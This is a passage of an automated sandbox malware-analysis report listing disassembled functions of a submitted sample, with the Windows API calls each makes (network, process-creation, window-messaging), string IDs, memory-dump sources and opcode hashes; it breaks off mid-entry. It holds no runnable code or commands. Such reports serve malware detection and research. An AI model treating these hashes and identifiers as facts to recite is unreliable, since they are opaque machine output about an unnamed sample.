                                                                  • Instruction Fuzzy Hash: 365126711147019BDB579F28C881BBBB7E9AF46350F06052EF8A6D71E1D760CDC48752
                                                                  Function 00390213 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120comlibraryloaderCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0039027B
                                                                  • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 003902B1
                                                                  • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 003902C2
                                                                  • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00390344
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorMode$AddressCreateInstanceProc
                                                                  • String ID: DllGetClassObject
                                                                  • API String ID: 753597075-1075368562
                                                                  • Opcode ID: 8f8578f07f9a9dfa866f92c82dce3559f1d4ccc4b246beeeed830f9d51cc62a1
                                                                  • Instruction ID: 765dbe2d108298ac92c0f74324579e8af0af8c351eee567c8d9e3dbbc6af66be
                                                                  • Opcode Fuzzy Hash: 8f8578f07f9a9dfa866f92c82dce3559f1d4ccc4b246beeeed830f9d51cc62a1
                                                                  • Instruction Fuzzy Hash: E3415AB5600205EFDF4ACF64C8C4B9A7BB9EF44310F1580AAE9099F246D7B1DA44DBA0
                                                                  Function 00395007 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • _memset.LIBCMT ref: 00395075
                                                                  • GetMenuItemInfoW.USER32 ref: 00395091
                                                                  • DeleteMenu.USER32(00000004,00000007,00000000), ref: 003950D7
                                                                  • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00411708,00000000), ref: 00395120
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: Menu$Delete$InfoItem_memset
                                                                  • String ID: 0
                                                                  • API String ID: 1173514356-4108050209
                                                                  • Opcode ID: cbd7c49c7bc5f0b4a3398603b7665de70d9daf18840f90af94ed7942e6a29a60
                                                                  • Instruction ID: b96259cf912821c28fcbb9ad4808ceee91dd80f453c4a050886164b5a3879013
                                                                  • Opcode Fuzzy Hash: cbd7c49c7bc5f0b4a3398603b7665de70d9daf18840f90af94ed7942e6a29a60
                                                                  • Instruction Fuzzy Hash: E841BF71205701AFDF23DF24D884F6AB7E8AF85324F154A1EF8959B291D730E984CB62
                                                                  Function 003B0567 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 100COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • CharLowerBuffW.USER32(?,?,?,?), ref: 003B0587
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: BuffCharLower
                                                                  • String ID: cdecl$none$stdcall$winapi
                                                                  • API String ID: 2358735015-567219261
                                                                  • Opcode ID: c24da4c7d27b1cb8a49dfbfed32254a3e66c44ce2cb2e1d37e8c73c6b46a99bd
                                                                  • Instruction ID: 5764a224ce714ad8df0a3ea99f9ddd2fcf8d54a0417613ee844d6434b305fda9
                                                                  • Opcode Fuzzy Hash: c24da4c7d27b1cb8a49dfbfed32254a3e66c44ce2cb2e1d37e8c73c6b46a99bd
                                                                  • Instruction Fuzzy Hash: B831B270500216AFCF06EF54CD41EEFB3B4FF55314B10862AE926AB6E1DB75A919CB40
                                                                  Function 0038B80A Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 93windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 0038B88E
                                                                  • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 0038B8A1
                                                                  • SendMessageW.USER32(?,00000189,?,00000000), ref: 0038B8D1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend
                                                                  • String ID: ComboBox$ListBox
                                                                  • API String ID: 3850602802-1403004172
                                                                  • Opcode ID: 4561a5c8fc74ff957f58b30fd76a48ccf879e7b34a1e8131f12121b1b5db435e
                                                                  • Instruction ID: 2bd2b6423103d46e779152b8ad8b0659bc70f77c9da875509f519acd1ebca7f6
                                                                  • Opcode Fuzzy Hash: 4561a5c8fc74ff957f58b30fd76a48ccf879e7b34a1e8131f12121b1b5db435e
                                                                  • Instruction Fuzzy Hash: 0721F371A00248BFDB06AB64D886DFEB77CDF05354B10416AF421AB1E0DB744E0A9B60
                                                                  Function 003A43E2 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 85networkCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 003A4401
                                                                  • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 003A4427
                                                                  • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 003A4457
                                                                  • InternetCloseHandle.WININET(00000000), ref: 003A449E
                                                                    • Part of subcall function 003A5052: GetLastError.KERNEL32(?,?,003A43CC,00000000,00000000,00000001), ref: 003A5067
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: HttpInternet$CloseErrorHandleInfoLastOpenQueryRequestSend
                                                                  • String ID:
                                                                  • API String ID: 1951874230-3916222277
                                                                  • Opcode ID: a1ce4f4f1ccbf242e782717c1a4288617209e67d19016ac73e83e9052da49331
                                                                  • Instruction ID: b74187514df2e6c44a099a8735f1b6cd0cf232b24bf223bed021d5d4cb80b790
                                                                  • Opcode Fuzzy Hash: a1ce4f4f1ccbf242e782717c1a4288617209e67d19016ac73e83e9052da49331
                                                                  • Instruction Fuzzy Hash: 30219FB2600208BFE7139F55DC85EBFB7ECEB8A758F10801AF50996141EAA48D059770
                                                                  Function 003B90E2 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 0036D17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0036D1BA
                                                                    • Part of subcall function 0036D17C: GetStockObject.GDI32(00000011), ref: 0036D1CE
                                                                    • Part of subcall function 0036D17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 0036D1D8
                                                                  • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 003B915C
                                                                  • LoadLibraryW.KERNEL32(?), ref: 003B9163
                                                                  • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 003B9178
                                                                  • DestroyWindow.USER32(?), ref: 003B9180
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                                  • String ID: SysAnimate32
                                                                  • API String ID: 4146253029-1011021900
                                                                  • Opcode ID: 45e7e1957957c4cad9e4864ad3c288edbc91bad9104b5083b4291bff34fd86b6
                                                                  • Instruction ID: 672c9b05974ec785265d0687b2c12352dd353ca65c44d02a3d625cd997155996
                                                                  • Opcode Fuzzy Hash: 45e7e1957957c4cad9e4864ad3c288edbc91bad9104b5083b4291bff34fd86b6
                                                                  • Instruction Fuzzy Hash: 1421BE71200206BBEF124F68DC88FFA37ADEB99368F11021AFB1496590C375DC41B760
                                                                  Function 00399568 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78filepipeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetStdHandle.KERNEL32(0000000C), ref: 00399588
                                                                  • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 003995B9
                                                                  • GetStdHandle.KERNEL32(0000000C), ref: 003995CB
                                                                  • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00399605
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: CreateHandle$FilePipe
                                                                  • String ID: nul
                                                                  • API String ID: 4209266947-2873401336
                                                                  • Opcode ID: 516ecfd470d32f9bf4aa36e21ac3ce1da7378f2725dbe5ce1aa44a746187f81e
                                                                  • Instruction ID: 778073b6233df19f819558444781325ae3fd03a9e69a9b94afd7b771f0f71c74
                                                                  • Opcode Fuzzy Hash: 516ecfd470d32f9bf4aa36e21ac3ce1da7378f2725dbe5ce1aa44a746187f81e
                                                                  • Instruction Fuzzy Hash: CF214C75600205ABEF229F69DC45B9B7BACAF46720F614A1EF9A1D72D0D770DD40CB20
                                                                  Function 00399634 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78filepipeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetStdHandle.KERNEL32(000000F6), ref: 00399653
                                                                  • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00399683
                                                                  • GetStdHandle.KERNEL32(000000F6), ref: 00399694
                                                                  • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 003996CE
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: CreateHandle$FilePipe
                                                                  • String ID: nul
                                                                  • API String ID: 4209266947-2873401336
                                                                  • Opcode ID: 4f0137495036ad7e0cf5318e1257bbb7b6001a14aa180d811cb85709c9fed4cb
                                                                  • Instruction ID: bfac13e2cabecade7498744e49f6f5faf44f335e5d6862aed10f91ecd28fbd13
                                                                  • Opcode Fuzzy Hash: 4f0137495036ad7e0cf5318e1257bbb7b6001a14aa180d811cb85709c9fed4cb
                                                                  • Instruction Fuzzy Hash: 4C213C716002059BDF22AF6D9C45F9AB7ACAF55734F200A1EF8A1E72D0E7709841CB60
                                                                  Function 0039DAF6 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 72COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SetErrorMode.KERNEL32(00000001), ref: 0039DB0A
                                                                  • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 0039DB5E
                                                                  • __swprintf.LIBCMT ref: 0039DB77
                                                                  • SetErrorMode.KERNEL32(00000000,00000001,00000000,003EDC00), ref: 0039DBB5
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorMode$InformationVolume__swprintf
                                                                  • String ID: %lu
                                                                  • API String ID: 3164766367-685833217
                                                                  • Opcode ID: 6adfd0330ae14b8be237a66145b66779ad463489d28bebb31106518167d98d0f
                                                                  • Instruction ID: 931d31a7edafe9b3686c4516818b1bf072ca9a45dd6b3c12b8b100e83167ae92
                                                                  • Opcode Fuzzy Hash: 6adfd0330ae14b8be237a66145b66779ad463489d28bebb31106518167d98d0f
                                                                  • Instruction Fuzzy Hash: 3B218635600208AFCB11DF65D985E9EBBFCEF48705B104069F909DB261DB70EA05CB61
                                                                  Function 0038C9E0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 67windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 0038C82D: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0038C84A
                                                                    • Part of subcall function 0038C82D: GetWindowThreadProcessId.USER32(?,00000000), ref: 0038C85D
                                                                    • Part of subcall function 0038C82D: GetCurrentThreadId.KERNEL32 ref: 0038C864
                                                                    • Part of subcall function 0038C82D: AttachThreadInput.USER32(00000000), ref: 0038C86B
                                                                  • GetFocus.USER32 ref: 0038CA05
                                                                    • Part of subcall function 0038C876: GetParent.USER32(?), ref: 0038C884
                                                                  • GetClassNameW.USER32(?,?,00000100), ref: 0038CA4E
                                                                  • EnumChildWindows.USER32(?,0038CAC4), ref: 0038CA76
                                                                  • __swprintf.LIBCMT ref: 0038CA90
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf
                                                                  • String ID: %s%d
                                                                  • API String ID: 3187004680-1110647743
                                                                  • Opcode ID: cd88bdedadf794eea661ac73019ae435e3859d4b4e09fc648dbfd1b00085cbce
                                                                  • Instruction ID: 625b40aa2ba9f3adc8edffadd4f90d8aa65228c8dc8430f47b8e6f9e5d2cc60e
                                                                  • Opcode Fuzzy Hash: cd88bdedadf794eea661ac73019ae435e3859d4b4e09fc648dbfd1b00085cbce
                                                                  • Instruction Fuzzy Hash: 411172B15503056BCB17BF649C86FE9377CAB44714F0090A6FE08AA182CB749545DBB0
                                                                  Function 00377A94 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __lock.LIBCMT ref: 00377AD8
                                                                    • Part of subcall function 00377CF4: __mtinitlocknum.LIBCMT ref: 00377D06
                                                                    • Part of subcall function 00377CF4: EnterCriticalSection.KERNEL32(00000000,?,00377ADD,0000000D), ref: 00377D1F
                                                                  • InterlockedIncrement.KERNEL32(?), ref: 00377AE5
                                                                  • __lock.LIBCMT ref: 00377AF9
                                                                  • ___addlocaleref.LIBCMT ref: 00377B17
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: __lock$CriticalEnterIncrementInterlockedSection___addlocaleref__mtinitlocknum
                                                                  • String ID: `=
                                                                  • API String ID: 1687444384-370013431
                                                                  • Opcode ID: eb8ae5d6f74055b7600cbde6f0ffc1021b4668b96a4f9d508bf820421a3ed978
                                                                  • Instruction ID: 8738d49133d22cb574b1c0a0f4573f207064bd9c73eecb72d71d5a1f99c04245
                                                                  • Opcode Fuzzy Hash: eb8ae5d6f74055b7600cbde6f0ffc1021b4668b96a4f9d508bf820421a3ed978
                                                                  • Instruction Fuzzy Hash: 13016D72504B00DFD732EF75D90674ABBF0EF44321F20890EA49A9B6A0CBB8A640CB15
                                                                  Function 003BE32E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 40processCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • _memset.LIBCMT ref: 003BE33D
                                                                  • _memset.LIBCMT ref: 003BE34C
                                                                  • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00413D00,00413D44), ref: 003BE37B
                                                                  • CloseHandle.KERNEL32 ref: 003BE38D
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: _memset$CloseCreateHandleProcess
                                                                  • String ID: D=A
                                                                  • API String ID: 3277943733-3823224246
                                                                  • Opcode ID: 906d17e6a974e141c4f500a8eaf9e40e05d45182090dbfd2e6f693858d1a71c3
                                                                  • Instruction ID: 98f7bc396baa511a23a8b46edb4dd0fdfd8ddbab85e1355fe9b4aed220a45c5a
                                                                  • Opcode Fuzzy Hash: 906d17e6a974e141c4f500a8eaf9e40e05d45182090dbfd2e6f693858d1a71c3
                                                                  • Instruction Fuzzy Hash: F8F05EF5540304BAE3215FA5BC45FF77E5CDB04756F008432BE08EA1A2D3799E1086AC
                                                                  Function 003B1945 Relevance: 7.7, APIs: 5, Instructions: 232COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 003B19F3
                                                                  • GetProcessIoCounters.KERNEL32(00000000,?), ref: 003B1A26
                                                                  • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 003B1B49
                                                                  • CloseHandle.KERNEL32(?), ref: 003B1BBF
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                                  • String ID:
                                                                  • API String ID: 2364364464-0
                                                                  • Opcode ID: 9829712466b89078da7207d51d8fb1ab2dba3f48a821e154c7fd1cffb743a786
                                                                  • Instruction ID: d6c224d9358ff11d5fbd5d29e50670e89b535158e99460bfa21bb4e8cab037e2
                                                                  • Opcode Fuzzy Hash: 9829712466b89078da7207d51d8fb1ab2dba3f48a821e154c7fd1cffb743a786
                                                                  • Instruction Fuzzy Hash: 5181A370600204ABDF12DF64C896BAEBBE9EF08724F15C459F905AF396D7B4E941CB90
                                                                  Function 003BE062 Relevance: 7.7, APIs: 5, Instructions: 187windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 003BE1D5
                                                                  • SendMessageW.USER32(?,000000B0,?,?), ref: 003BE20D
                                                                  • IsDlgButtonChecked.USER32(?,00000001), ref: 003BE248
                                                                  • GetWindowLongW.USER32(?,000000EC), ref: 003BE269
                                                                  • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 003BE281
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$ButtonCheckedLongWindow
                                                                  • String ID:
                                                                  • API String ID: 3188977179-0
                                                                  • Opcode ID: e889eb63e9c7977ec71457ce097f1c2fb8831cb81abe107a792344d6b322dea9
                                                                  • Instruction ID: 9b5346d58d317f21b04566039755a8a9817ef47de5bc6672b0d84c0252a10931
                                                                  • Opcode Fuzzy Hash: e889eb63e9c7977ec71457ce097f1c2fb8831cb81abe107a792344d6b322dea9
                                                                  • Instruction Fuzzy Hash: 4861B434A00204AFDB22DF6CC855FEA77BAEF49308F15805AFA599B7A1C771AD40CB50
                                                                  Function 00391C9A Relevance: 7.7, APIs: 5, Instructions: 158COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • VariantInit.OLEAUT32(?), ref: 00391CB4
                                                                  • VariantClear.OLEAUT32(00000013), ref: 00391D26
                                                                  • VariantClear.OLEAUT32(00000000), ref: 00391D81
                                                                  • VariantClear.OLEAUT32(?), ref: 00391DF8
                                                                  • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00391E26
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
